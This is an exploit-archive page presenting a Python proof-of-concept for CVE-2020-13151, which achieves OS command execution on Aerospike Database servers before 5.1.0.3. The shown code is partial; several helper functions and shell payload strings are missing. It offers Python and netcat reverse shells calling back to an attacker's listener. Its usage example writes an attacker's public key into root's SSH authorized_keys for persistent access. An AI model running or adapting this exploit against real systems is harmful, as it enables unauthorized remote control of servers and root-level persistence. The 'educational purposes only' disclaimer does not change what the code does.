Aerospike database 5.1.0.3 os command execution Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2020-11-17 |
Type : remote |
Platform : multiple
This exploit / vulnerability Aerospike database 5.1.0.3 os command execution is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Aerospike Database 5.1.0.3 - OS Command Execution
# Date: 2020-08-01
# Exploit Author: Matt S
# Vendor Homepage: https://www.aerospike.com/
# Version: < 5.1.0.3
# Tested on: Ubuntu 18.04
# CVE : CVE-2020-13151
#!/usr/bin/env python3
import argparse
import random
import os, sys
from time import sleep
import string
# requires aerospike package from pip
import aerospike
# if this isn't installing, make sure os dependencies are met
# sudo apt-get install python-dev
# sudo apt-get install libssl-dev
# sudo apt-get install python-pip
# sudo apt-get install zlib1g-dev
if cfg.pythonshell or cfg.netcatshell:
sys.stdout.flush()
print(f"[+] sending payload, make sure you have a listener on {cfg.lhost}:{cfg.lport}", end="")
sys.stdout.flush()
for i in range(4):
print(".", end="")
sys.stdout.flush()
sleep(1)
print(".")
_send(client, cfg, PYTHONSHELL.format(ip=cfg.lhost,port=cfg.lport) if cfg.pythonshell else NETCATSHELL.format(ip=cfg.lhost,port=cfg.lport) )
if cfg.cmd:
print(f"[+] issuing command \"{cfg.cmd}\"")
_send(client, cfg, cfg.cmd)
if __name__ == '__main__':
if len(sys.argv) == 1:
print(f"[+] usage examples:\n{sys.argv[0]} --ahost 10.11.12.13 --pythonshell --lhost=10.0.0.1 --lport=8000")
print("... or ... ")
print(f"{sys.argv[0]} --ahost 10.11.12.13 --cmd 'echo MYPUBKEY > /root/.ssh/authorized_keys'")
sys.exit(0)
parser.add_argument("--ahost", help="Aerospike host, default 127.0.0.1", default="127.0.0.1")
parser.add_argument("--aport", help="Aerospike port, default 3000", default=3000, type=int)
parser.add_argument("--namespace", help="Namespace in which to create the record set", default="test")
parser.add_argument("--setname", help="Name of set to populate with dummy record(s), default is cve202013151", default=None)
parser.add_argument('--dummystring', help="leave blank for a random value, can use a previously written key to target a specific cluster node", default=None)
parser.add_argument("--pythonshell", help="attempt to use a python reverse shell (requires lhost and lport)", action="store_true")
parser.add_argument("--netcatshell", help="attempt to use a netcat reverse shell (requires lhost and lport)", action="store_true")
parser.add_argument("--lhost", help="host to use for reverse shell callback")
parser.add_argument("--lport", help="port to use for reverse shell callback")
parser.add_argument("--cmd", help="custom command to issue against the underlying host")
parser.add_argument('--udfpath', help="where is the udf to distribute? defaults to `pwd`/poc.lua", default=None)
cfg = parser.parse_args()
if not cfg.setname:
cfg.setname = 'cve202013151'
if not cfg.dummystring:
cfg.dummystring = _random_string(16)
if not cfg.udfpath:
cfg.udfpath = os.path.join(os.getcwd(), 'poc.lua')
assert cfg.cmd or (cfg.lhost and cfg.lport and (cfg.pythonshell or cfg.netcatshell)), "Must specify a command, or a reverse shell + lhost + lport"
if cfg.pythonshell or cfg.netcatshell:
assert cfg.lhost and cfg.lport, "Must specify lhost and lport if using a reverse shell"